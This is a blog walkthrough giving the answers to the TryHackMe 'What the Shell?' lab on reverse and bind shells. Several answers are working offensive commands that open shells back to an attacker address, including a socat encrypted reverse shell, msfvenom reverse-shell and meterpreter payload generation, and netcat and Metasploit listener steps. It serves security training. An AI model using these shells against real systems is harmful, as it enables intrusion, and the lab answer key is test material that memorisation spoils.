Home front-page port 80-shoopyu What the Shell? | Tryhackme
Post
Cancel

front-page port 80-shoopyu What the Shell? | Tryhackme

Posted Aug 12, 2022
By Cotes Chung
2 min read

Β 

simple-ctf-logo

What the shell?

Β  An introduction to sending and receiving (reverse/bind) shells when exploiting target machines.

Task 3

πŸ’’note: Task 1,2 have no answer needed

Q: Which type of shell connects back to a listening port on your computer, Reverse (R) or Bind (B)?

A: R

Q: You have injected malicious shell code into a website. Is the shell you receive likely to be interactive? (Y or N)

A: N

Q: When using a bind shell, would you execute a listener on the Attacker (A) or the Target (T)?

A: T

Β 

Task 4 Netcat

Q: Which option tells netcat to listen?

A: -l

Q: How would you connect to a bind shell on the IP address: 10.10.10.11 with port 8080?

A: nc 10.10.10.11 8080

Β 

Task 5 Netcat Shell Stabilisation

Q: How would you change your terminal size to have 238 columns?

A: stty cols 238

Q: What is the syntax for setting up a Python3 webserver on port 80?

A: sudo python3 -m http.server 80

Β 

Task 6 Socat

Q: How would we get socat to listen on TCP port 8080?

A: TCP-L:8080

Β 

Task 7 Socat Encrypted Shells

Q: What is the syntax for setting up an OPENSSL-LISTENER using the tty technique from the previous task? Use port 53, and a PEM file called β€œencrypt.pem”

A: socat OPENSSL-LISTEN:53,cert=encrypt.pem,verify=0 FILE:`tty`,raw,echo=0

Q: If your IP is 10.10.10.5, what syntax would you use to connect back to this listener?

A: socat OPENSSL:10.10.10.5:53,verify=0 EXEC:"bash -li",pty,stderr,sigint,setsid,sane

Β 

Task 8 Common Shell Payloads

Q: What command can be used to create a named pipe in Linux?

A: mkfifo

– Β 

Task 9 msfvenom

Q: Generate a staged reverse shell for a 64 bit Windows target, in a .exe format using your TryHackMe tun0 IP address and a chosen port

A: msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port number>

Q: Which symbol is used to show that a shell is stageless?

A: _

Q: What command would you use to generate a staged meterpreter reverse shell for a 64bit Linux target, assuming your own IP was 10.10.10.5, and you were listening on port 443? The format for the shell is elf and the output filename should be shell

A: msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf -o shell LHOST=10.10.10.5 LPORT=443

Task 10 Metasploit multi/handler

Q: What command can be used to start a listener in the background?

A: exploit -j

Q: If we had just received our tenth reverse shell in the current Metasploit session, what would be the command used to foreground it?

A: sessions 10

Write Up, TryHackMe
walkthrough THM Tryhackme shell socat webshell reverse shell msfvenom shell bind shell
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents

front-page port 80-shoopyu Cybersecurity Resources πŸ’»πŸ›‘οΈ

front-page port 80-shoopyu Meow | HackTheBox Easy